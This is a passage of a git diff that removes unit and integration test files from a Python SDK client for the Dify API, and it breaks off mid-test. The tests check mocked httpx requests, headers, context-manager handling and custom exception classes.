"Hello! This is a test response."}' - mock_response.json.return_value = {"answer": "Hello! This is a test response."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - @patch("dify_client.client.httpx.Client") - def test_create_chat_message(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "Hello! This is a test response."}' - mock_response.json.return_value = {"answer": "Hello! This is a test response."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - chat_client = ChatClient(self.api_key) - response = chat_client.create_chat_message({}, "Hello, World!", "test_user") - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_create_chat_message_with_vision_model_by_remote_url(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "I can see this is a test image description."}' - mock_response.json.return_value = {"answer": "I can see this is a test image description."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - chat_client = ChatClient(self.api_key) - files = [{"type": "image", "transfer_method": "remote_url", "url": "https://example.com/test-image.jpg"}] - response = chat_client.create_chat_message({}, "Describe the picture.", "test_user", files=files) - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_create_chat_message_with_vision_model_by_local_file(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "I can see this is a test uploaded image."}' - mock_response.json.return_value = {"answer": "I can see this is a test uploaded image."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - chat_client = ChatClient(self.api_key) - files = [ - { - "type": "image", - "transfer_method": "local_file", - "upload_file_id": "test-file-id", - } - ] - response = chat_client.create_chat_message({}, "Describe the picture.", "test_user", files=files) - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_get_conversation_messages(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "Here are the conversation messages."}' - mock_response.json.return_value = {"answer": "Here are the conversation messages."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - chat_client = ChatClient(self.api_key) - response = chat_client.get_conversation_messages("test_user", "test-conversation-id") - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_get_conversations(self, 
mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"data": [{"id": "conv1", "name": "Test Conversation"}]}' - mock_response.json.return_value = {"data": [{"id": "conv1", "name": "Test Conversation"}]} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - chat_client = ChatClient(self.api_key) - response = chat_client.get_conversations("test_user") - self.assertIn("data", response.text) - - -class TestCompletionClient(unittest.TestCase): - @patch("dify_client.client.httpx.Client") - def setUp(self, mock_httpx_client): - self.api_key = "test-api-key" - self.completion_client = CompletionClient(self.api_key) - - # Set up default mock response for the client - mock_response = Mock() - mock_response.text = '{"answer": "This is a test completion response."}' - mock_response.json.return_value = {"answer": "This is a test completion response."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - @patch("dify_client.client.httpx.Client") - def test_create_completion_message(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "The weather today is sunny with a temperature of 75°F."}' - mock_response.json.return_value = {"answer": "The weather today is sunny with a temperature of 75°F."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - completion_client = CompletionClient(self.api_key) - response = completion_client.create_completion_message( - {"query": "What's the weather like today?"}, "blocking", "test_user" - ) - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_create_completion_message_with_vision_model_by_remote_url(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "This is a test image description from completion API."}' - mock_response.json.return_value = {"answer": "This is a test image description from completion API."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - completion_client = CompletionClient(self.api_key) - files = [{"type": "image", "transfer_method": "remote_url", "url": "https://example.com/test-image.jpg"}] - response = completion_client.create_completion_message( - {"query": "Describe the picture."}, "blocking", "test_user", files - ) - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_create_completion_message_with_vision_model_by_local_file(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "This is a test uploaded image description from completion API."}' - mock_response.json.return_value = {"answer": "This is a test uploaded image description from completion API."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - 
mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - completion_client = CompletionClient(self.api_key) - files = [ - { - "type": "image", - "transfer_method": "local_file", - "upload_file_id": "test-file-id", - } - ] - response = completion_client.create_completion_message( - {"query": "Describe the picture."}, "blocking", "test_user", files - ) - self.assertIn("answer", response.text) - - -class TestDifyClient(unittest.TestCase): - @patch("dify_client.client.httpx.Client") - def setUp(self, mock_httpx_client): - self.api_key = "test-api-key" - self.dify_client = DifyClient(self.api_key) - - # Set up default mock response for the client - mock_response = Mock() - mock_response.text = '{"result": "success"}' - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - @patch("dify_client.client.httpx.Client") - def test_message_feedback(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"success": true}' - mock_response.json.return_value = {"success": True} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - dify_client = DifyClient(self.api_key) - response = dify_client.message_feedback("test-message-id", "like", "test_user") - self.assertIn("success", response.text) - - @patch("dify_client.client.httpx.Client") - def test_get_application_parameters(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"user_input_form": [{"field": "text", "label": "Input"}]}' - mock_response.json.return_value = {"user_input_form": [{"field": "text", "label": "Input"}]} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - dify_client = DifyClient(self.api_key) - response = dify_client.get_application_parameters("test_user") - self.assertIn("user_input_form", response.text) - - @patch("dify_client.client.httpx.Client") - @patch("builtins.open", new_callable=mock_open, read_data=b"fake image data") - def test_file_upload(self, mock_file_open, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"name": "panda.jpeg", "id": "test-file-id"}' - mock_response.json.return_value = {"name": "panda.jpeg", "id": "test-file-id"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - dify_client = DifyClient(self.api_key) - file_path = "/path/to/test/panda.jpeg" - file_name = "panda.jpeg" - mime_type = "image/jpeg" - - with open(file_path, "rb") as file: - files = {"file": (file_name, file, mime_type)} - response = dify_client.file_upload("test_user", files) - self.assertIn("name", response.text) - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_exceptions.py b/sdks/python-client/tests/test_exceptions.py deleted file mode 100644 index eb44895749..0000000000 --- a/sdks/python-client/tests/test_exceptions.py +++ 
/dev/null @@ -1,79 +0,0 @@ -"""Tests for custom exceptions.""" - -import unittest -from dify_client.exceptions import ( - DifyClientError, - APIError, - AuthenticationError, - RateLimitError, - ValidationError, - NetworkError, - TimeoutError, - FileUploadError, - DatasetError, - WorkflowError, -) - - -class TestExceptions(unittest.TestCase): - """Test custom exception classes.""" - - def test_base_exception(self): - """Test base DifyClientError.""" - error = DifyClientError("Test message", 500, {"error": "details"}) - self.assertEqual(str(error), "Test message") - self.assertEqual(error.status_code, 500) - self.assertEqual(error.response, {"error": "details"}) - - def test_api_error(self): - """Test APIError.""" - error = APIError("API failed", 400) - self.assertEqual(error.status_code, 400) - self.assertEqual(error.message, "API failed") - - def test_authentication_error(self): - """Test AuthenticationError.""" - error = AuthenticationError("Invalid API key") - self.assertEqual(str(error), "Invalid API key") - - def test_rate_limit_error(self): - """Test RateLimitError.""" - error = RateLimitError("Rate limited", retry_after=60) - self.assertEqual(error.retry_after, 60) - - error_default = RateLimitError() - self.assertEqual(error_default.retry_after, None) - - def test_validation_error(self): - """Test ValidationError.""" - error = ValidationError("Invalid parameter") - self.assertEqual(str(error), "Invalid parameter") - - def test_network_error(self): - """Test NetworkError.""" - error = NetworkError("Connection failed") - self.assertEqual(str(error), "Connection failed") - - def test_timeout_error(self): - """Test TimeoutError.""" - error = TimeoutError("Request timed out") - self.assertEqual(str(error), "Request timed out") - - def test_file_upload_error(self): - """Test FileUploadError.""" - error = FileUploadError("Upload failed") - self.assertEqual(str(error), "Upload failed") - - def test_dataset_error(self): - """Test DatasetError.""" - error = DatasetError("Dataset operation failed") - self.assertEqual(str(error), "Dataset operation failed") - - def test_workflow_error(self): - """Test WorkflowError.""" - error = WorkflowError("Workflow failed") - self.assertEqual(str(error), "Workflow failed") - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_httpx_migration.py b/sdks/python-client/tests/test_httpx_migration.py deleted file mode 100644 index cf26de6eba..0000000000 --- a/sdks/python-client/tests/test_httpx_migration.py +++ /dev/null @@ -1,333 +0,0 @@ -#!/usr/bin/env python3 -""" -Test suite for httpx migration in the Python SDK. - -This test validates that the migration from requests to httpx maintains -backward compatibility and proper resource management. 
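The assertions in `test_base_exception` pin down the constructor shape; reconstructed from them, the deleted base class presumably looked roughly like this (an inference from the tests, not the original source; `RateLimitError` additionally carries the `retry_after` checked above):

```python
class DifyClientError(Exception):
    """Base SDK error carrying the HTTP status and raw response payload."""

    def __init__(self, message: str, status_code: int | None = None, response=None):
        super().__init__(message)  # makes str(error) return the message
        self.message = message
        self.status_code = status_code
        self.response = response
```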
-""" - -import unittest -from unittest.mock import Mock, patch - -from dify_client import ( - DifyClient, - ChatClient, - CompletionClient, - WorkflowClient, - WorkspaceClient, - KnowledgeBaseClient, -) - - -class TestHttpxMigrationMocked(unittest.TestCase): - """Test cases for httpx migration with mocked requests.""" - - def setUp(self): - """Set up test fixtures.""" - self.api_key = "test-api-key" - self.base_url = "https://api.dify.ai/v1" - - @patch("dify_client.client.httpx.Client") - def test_client_initialization(self, mock_httpx_client): - """Test that client initializes with httpx.Client.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - - # Verify httpx.Client was called with correct parameters - mock_httpx_client.assert_called_once() - call_kwargs = mock_httpx_client.call_args[1] - self.assertEqual(call_kwargs["base_url"], self.base_url) - - # Verify client properties - self.assertEqual(client.api_key, self.api_key) - self.assertEqual(client.base_url, self.base_url) - - client.close() - - @patch("dify_client.client.httpx.Client") - def test_context_manager_support(self, mock_httpx_client): - """Test that client works as context manager.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - with DifyClient(self.api_key, self.base_url) as client: - self.assertEqual(client.api_key, self.api_key) - - # Verify close was called - mock_client_instance.close.assert_called_once() - - @patch("dify_client.client.httpx.Client") - def test_manual_close(self, mock_httpx_client): - """Test manual close() method.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - client.close() - - # Verify close was called - mock_client_instance.close.assert_called_once() - - @patch("dify_client.client.httpx.Client") - def test_send_request_httpx_compatibility(self, mock_httpx_client): - """Test _send_request uses httpx.Client.request properly.""" - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - response = client._send_request("GET", "/test-endpoint") - - # Verify httpx.Client.request was called correctly - mock_client_instance.request.assert_called_once() - call_args = mock_client_instance.request.call_args - - # Verify method and endpoint - self.assertEqual(call_args[0][0], "GET") - self.assertEqual(call_args[0][1], "/test-endpoint") - - # Verify headers contain authorization - headers = call_args[1]["headers"] - self.assertEqual(headers["Authorization"], f"Bearer {self.api_key}") - self.assertEqual(headers["Content-Type"], "application/json") - - client.close() - - @patch("dify_client.client.httpx.Client") - def test_response_compatibility(self, mock_httpx_client): - """Test httpx.Response is compatible with requests.Response API.""" - mock_response = Mock() - mock_response.json.return_value = {"key": "value"} - mock_response.text = '{"key": "value"}' - mock_response.content = b'{"key": "value"}' - mock_response.status_code = 200 - mock_response.headers = {"Content-Type": "application/json"} - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - 
mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - response = client._send_request("GET", "/test") - - # Verify all common response methods work - self.assertEqual(response.json(), {"key": "value"}) - self.assertEqual(response.text, '{"key": "value"}') - self.assertEqual(response.content, b'{"key": "value"}') - self.assertEqual(response.status_code, 200) - self.assertEqual(response.headers["Content-Type"], "application/json") - - client.close() - - @patch("dify_client.client.httpx.Client") - def test_all_client_classes_use_httpx(self, mock_httpx_client): - """Test that all client classes properly use httpx.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - clients = [ - DifyClient(self.api_key, self.base_url), - ChatClient(self.api_key, self.base_url), - CompletionClient(self.api_key, self.base_url), - WorkflowClient(self.api_key, self.base_url), - WorkspaceClient(self.api_key, self.base_url), - KnowledgeBaseClient(self.api_key, self.base_url), - ] - - # Verify httpx.Client was called for each client - self.assertEqual(mock_httpx_client.call_count, 6) - - # Clean up - for client in clients: - client.close() - - @patch("dify_client.client.httpx.Client") - def test_json_parameter_handling(self, mock_httpx_client): - """Test that json parameter is passed correctly.""" - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 # Add status_code attribute - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - test_data = {"key": "value", "number": 123} - - client._send_request("POST", "/test", json=test_data) - - # Verify json parameter was passed - call_args = mock_client_instance.request.call_args - self.assertEqual(call_args[1]["json"], test_data) - - client.close() - - @patch("dify_client.client.httpx.Client") - def test_params_parameter_handling(self, mock_httpx_client): - """Test that params parameter is passed correctly.""" - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 # Add status_code attribute - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - test_params = {"page": 1, "limit": 20} - - client._send_request("GET", "/test", params=test_params) - - # Verify params parameter was passed - call_args = mock_client_instance.request.call_args - self.assertEqual(call_args[1]["params"], test_params) - - client.close() - - @patch("dify_client.client.httpx.Client") - def test_inheritance_chain(self, mock_httpx_client): - """Test that inheritance chain is maintained.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - # ChatClient inherits from DifyClient - chat_client = ChatClient(self.api_key, self.base_url) - self.assertIsInstance(chat_client, DifyClient) - - # CompletionClient inherits from DifyClient - completion_client = CompletionClient(self.api_key, self.base_url) - self.assertIsInstance(completion_client, DifyClient) - - # WorkflowClient inherits from DifyClient - workflow_client = WorkflowClient(self.api_key, self.base_url) - self.assertIsInstance(workflow_client, DifyClient) - - # Clean up - chat_client.close() - 
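Taken together, `test_send_request_httpx_compatibility` and the parameter-handling tests in this file pin down `_send_request`'s calling convention; reconstructed from those assertions, the method presumably reduces to something like this (a sketch, not the deleted source):

```python
import httpx


class DifyClient:
    def __init__(self, api_key: str, base_url: str = "https://api.dify.ai/v1"):
        self.api_key = api_key
        self.base_url = base_url
        # base_url is passed through to httpx.Client, per test_client_initialization.
        self._client = httpx.Client(base_url=base_url)

    def _send_request(self, method: str, endpoint: str, json=None, params=None):
        # Every call carries the bearer token and a JSON content type,
        # matching the exact-match header assertions in this suite.
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json",
        }
        return self._client.request(method, endpoint, json=json, params=params, headers=headers)

    def close(self):
        self._client.close()
```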
completion_client.close() - workflow_client.close() - - @patch("dify_client.client.httpx.Client") - def test_nested_context_managers(self, mock_httpx_client): - """Test nested context managers work correctly.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - with DifyClient(self.api_key, self.base_url) as client1: - with ChatClient(self.api_key, self.base_url) as client2: - self.assertEqual(client1.api_key, self.api_key) - self.assertEqual(client2.api_key, self.api_key) - - # Both close methods should have been called - self.assertEqual(mock_client_instance.close.call_count, 2) - - -class TestChatClientHttpx(unittest.TestCase): - """Test ChatClient specific httpx integration.""" - - @patch("dify_client.client.httpx.Client") - def test_create_chat_message_httpx(self, mock_httpx_client): - """Test create_chat_message works with httpx.""" - mock_response = Mock() - mock_response.text = '{"answer": "Hello!"}' - mock_response.json.return_value = {"answer": "Hello!"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - with ChatClient("test-key") as client: - response = client.create_chat_message({}, "Hi", "user123") - self.assertIn("answer", response.text) - self.assertEqual(response.json()["answer"], "Hello!") - - -class TestCompletionClientHttpx(unittest.TestCase): - """Test CompletionClient specific httpx integration.""" - - @patch("dify_client.client.httpx.Client") - def test_create_completion_message_httpx(self, mock_httpx_client): - """Test create_completion_message works with httpx.""" - mock_response = Mock() - mock_response.text = '{"answer": "Response"}' - mock_response.json.return_value = {"answer": "Response"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - with CompletionClient("test-key") as client: - response = client.create_completion_message({"query": "test"}, "blocking", "user123") - self.assertIn("answer", response.text) - - -class TestKnowledgeBaseClientHttpx(unittest.TestCase): - """Test KnowledgeBaseClient specific httpx integration.""" - - @patch("dify_client.client.httpx.Client") - def test_list_datasets_httpx(self, mock_httpx_client): - """Test list_datasets works with httpx.""" - mock_response = Mock() - mock_response.json.return_value = {"data": [], "total": 0} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - with KnowledgeBaseClient("test-key") as client: - response = client.list_datasets() - data = response.json() - self.assertIn("data", data) - self.assertIn("total", data) - - -class TestWorkflowClientHttpx(unittest.TestCase): - """Test WorkflowClient specific httpx integration.""" - - @patch("dify_client.client.httpx.Client") - def test_run_workflow_httpx(self, mock_httpx_client): - """Test run workflow works with httpx.""" - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - with WorkflowClient("test-key") as client: - response = client.run({"input": "test"}, "blocking", "user123") - 
self.assertEqual(response.json()["result"], "success") - - -class TestWorkspaceClientHttpx(unittest.TestCase): - """Test WorkspaceClient specific httpx integration.""" - - @patch("dify_client.client.httpx.Client") - def test_get_available_models_httpx(self, mock_httpx_client): - """Test get_available_models works with httpx.""" - mock_response = Mock() - mock_response.json.return_value = {"data": []} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - with WorkspaceClient("test-key") as client: - response = client.get_available_models("llm") - self.assertIn("data", response.json()) - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_integration.py b/sdks/python-client/tests/test_integration.py deleted file mode 100644 index 6f38c5de56..0000000000 --- a/sdks/python-client/tests/test_integration.py +++ /dev/null @@ -1,539 +0,0 @@ -"""Integration tests with proper mocking.""" - -import unittest -from unittest.mock import Mock, patch, MagicMock -import json -import httpx -from dify_client import ( - DifyClient, - ChatClient, - CompletionClient, - WorkflowClient, - KnowledgeBaseClient, - WorkspaceClient, -) -from dify_client.exceptions import ( - APIError, - AuthenticationError, - RateLimitError, - ValidationError, -) - - -class TestDifyClientIntegration(unittest.TestCase): - """Integration tests for DifyClient with mocked HTTP responses.""" - - def setUp(self): - self.api_key = "test_api_key" - self.base_url = "https://api.dify.ai/v1" - self.client = DifyClient(api_key=self.api_key, base_url=self.base_url, enable_logging=False) - - @patch("httpx.Client.request") - def test_get_app_info_integration(self, mock_request): - """Test get_app_info integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "app_123", - "name": "Test App", - "description": "A test application", - "mode": "chat", - } - mock_request.return_value = mock_response - - response = self.client.get_app_info() - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["id"], "app_123") - self.assertEqual(data["name"], "Test App") - mock_request.assert_called_once_with( - "GET", - "/info", - json=None, - params=None, - headers={ - "Authorization": f"Bearer {self.api_key}", - "Content-Type": "application/json", - }, - ) - - @patch("httpx.Client.request") - def test_get_application_parameters_integration(self, mock_request): - """Test get_application_parameters integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "opening_statement": "Hello! How can I help you?", - "suggested_questions": ["What is AI?", "How does this work?"], - "speech_to_text": {"enabled": True}, - "text_to_speech": {"enabled": False}, - } - mock_request.return_value = mock_response - - response = self.client.get_application_parameters("user_123") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["opening_statement"], "Hello! 
How can I help you?") - self.assertEqual(len(data["suggested_questions"]), 2) - mock_request.assert_called_once_with( - "GET", - "/parameters", - json=None, - params={"user": "user_123"}, - headers={ - "Authorization": f"Bearer {self.api_key}", - "Content-Type": "application/json", - }, - ) - - @patch("httpx.Client.request") - def test_file_upload_integration(self, mock_request): - """Test file_upload integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "file_123", - "name": "test.txt", - "size": 1024, - "mime_type": "text/plain", - } - mock_request.return_value = mock_response - - files = {"file": ("test.txt", "test content", "text/plain")} - response = self.client.file_upload("user_123", files) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["id"], "file_123") - self.assertEqual(data["name"], "test.txt") - - @patch("httpx.Client.request") - def test_message_feedback_integration(self, mock_request): - """Test message_feedback integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = {"success": True} - mock_request.return_value = mock_response - - response = self.client.message_feedback("msg_123", "like", "user_123") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertTrue(data["success"]) - mock_request.assert_called_once_with( - "POST", - "/messages/msg_123/feedbacks", - json={"rating": "like", "user": "user_123"}, - params=None, - headers={ - "Authorization": "Bearer test_api_key", - "Content-Type": "application/json", - }, - ) - - -class TestChatClientIntegration(unittest.TestCase): - """Integration tests for ChatClient.""" - - def setUp(self): - self.client = ChatClient("test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_create_chat_message_blocking(self, mock_request): - """Test create_chat_message with blocking response.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "msg_123", - "answer": "Hello! How can I help you today?", - "conversation_id": "conv_123", - "created_at": 1234567890, - } - mock_request.return_value = mock_response - - response = self.client.create_chat_message( - inputs={"query": "Hello"}, - query="Hello, AI!", - user="user_123", - response_mode="blocking", - ) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["answer"], "Hello! 
How can I help you today?") - self.assertEqual(data["conversation_id"], "conv_123") - - @patch("httpx.Client.request") - def test_create_chat_message_streaming(self, mock_request): - """Test create_chat_message with streaming response.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.iter_lines.return_value = [ - b'data: {"answer": "Hello"}', - b'data: {"answer": " world"}', - b'data: {"answer": "!"}', - ] - mock_request.return_value = mock_response - - response = self.client.create_chat_message(inputs={}, query="Hello", user="user_123", response_mode="streaming") - - self.assertEqual(response.status_code, 200) - lines = list(response.iter_lines()) - self.assertEqual(len(lines), 3) - - @patch("httpx.Client.request") - def test_get_conversations_integration(self, mock_request): - """Test get_conversations integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "data": [ - {"id": "conv_1", "name": "Conversation 1"}, - {"id": "conv_2", "name": "Conversation 2"}, - ], - "has_more": False, - "limit": 20, - } - mock_request.return_value = mock_response - - response = self.client.get_conversations("user_123", limit=20) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(len(data["data"]), 2) - self.assertEqual(data["data"][0]["name"], "Conversation 1") - - @patch("httpx.Client.request") - def test_get_conversation_messages_integration(self, mock_request): - """Test get_conversation_messages integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "data": [ - {"id": "msg_1", "role": "user", "content": "Hello"}, - {"id": "msg_2", "role": "assistant", "content": "Hi there!"}, - ] - } - mock_request.return_value = mock_response - - response = self.client.get_conversation_messages("user_123", conversation_id="conv_123") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(len(data["data"]), 2) - self.assertEqual(data["data"][0]["role"], "user") - - -class TestCompletionClientIntegration(unittest.TestCase): - """Integration tests for CompletionClient.""" - - def setUp(self): - self.client = CompletionClient("test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_create_completion_message_blocking(self, mock_request): - """Test create_completion_message with blocking response.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "comp_123", - "answer": "This is a completion response.", - "created_at": 1234567890, - } - mock_request.return_value = mock_response - - response = self.client.create_completion_message( - inputs={"prompt": "Complete this sentence"}, - response_mode="blocking", - user="user_123", - ) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["answer"], "This is a completion response.") - - @patch("httpx.Client.request") - def test_create_completion_message_with_files(self, mock_request): - """Test create_completion_message with files.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "comp_124", - "answer": "I can see the image shows...", - "files": [{"id": "file_1", "type": "image"}], - } - mock_request.return_value = mock_response - - files = { - "file": { - "type": "image", - "transfer_method": "remote_url", - "url": "https://example.com/image.jpg", - } - } - response = 
self.client.create_completion_message( - inputs={"prompt": "Describe this image"}, - response_mode="blocking", - user="user_123", - files=files, - ) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertIn("image", data["answer"]) - self.assertEqual(len(data["files"]), 1) - - -class TestWorkflowClientIntegration(unittest.TestCase): - """Integration tests for WorkflowClient.""" - - def setUp(self): - self.client = WorkflowClient("test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_run_workflow_blocking(self, mock_request): - """Test run workflow with blocking response.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "run_123", - "workflow_id": "workflow_123", - "status": "succeeded", - "inputs": {"query": "Test input"}, - "outputs": {"result": "Test output"}, - "elapsed_time": 2.5, - } - mock_request.return_value = mock_response - - response = self.client.run(inputs={"query": "Test input"}, response_mode="blocking", user="user_123") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["status"], "succeeded") - self.assertEqual(data["outputs"]["result"], "Test output") - - @patch("httpx.Client.request") - def test_get_workflow_logs(self, mock_request): - """Test get_workflow_logs integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "logs": [ - {"id": "log_1", "status": "succeeded", "created_at": 1234567890}, - {"id": "log_2", "status": "failed", "created_at": 1234567891}, - ], - "total": 2, - "page": 1, - "limit": 20, - } - mock_request.return_value = mock_response - - response = self.client.get_workflow_logs(page=1, limit=20) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(len(data["logs"]), 2) - self.assertEqual(data["logs"][0]["status"], "succeeded") - - -class TestKnowledgeBaseClientIntegration(unittest.TestCase): - """Integration tests for KnowledgeBaseClient.""" - - def setUp(self): - self.client = KnowledgeBaseClient("test_api_key") - - @patch("httpx.Client.request") - def test_create_dataset(self, mock_request): - """Test create_dataset integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "dataset_123", - "name": "Test Dataset", - "description": "A test dataset", - "created_at": 1234567890, - } - mock_request.return_value = mock_response - - response = self.client.create_dataset(name="Test Dataset") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["name"], "Test Dataset") - self.assertEqual(data["id"], "dataset_123") - - @patch("httpx.Client.request") - def test_list_datasets(self, mock_request): - """Test list_datasets integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "data": [ - {"id": "dataset_1", "name": "Dataset 1"}, - {"id": "dataset_2", "name": "Dataset 2"}, - ], - "has_more": False, - "limit": 20, - } - mock_request.return_value = mock_response - - response = self.client.list_datasets(page=1, page_size=20) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(len(data["data"]), 2) - - @patch("httpx.Client.request") - def test_create_document_by_text(self, mock_request): - """Test create_document_by_text integration.""" - mock_response = Mock() - mock_response.status_code = 200 - 
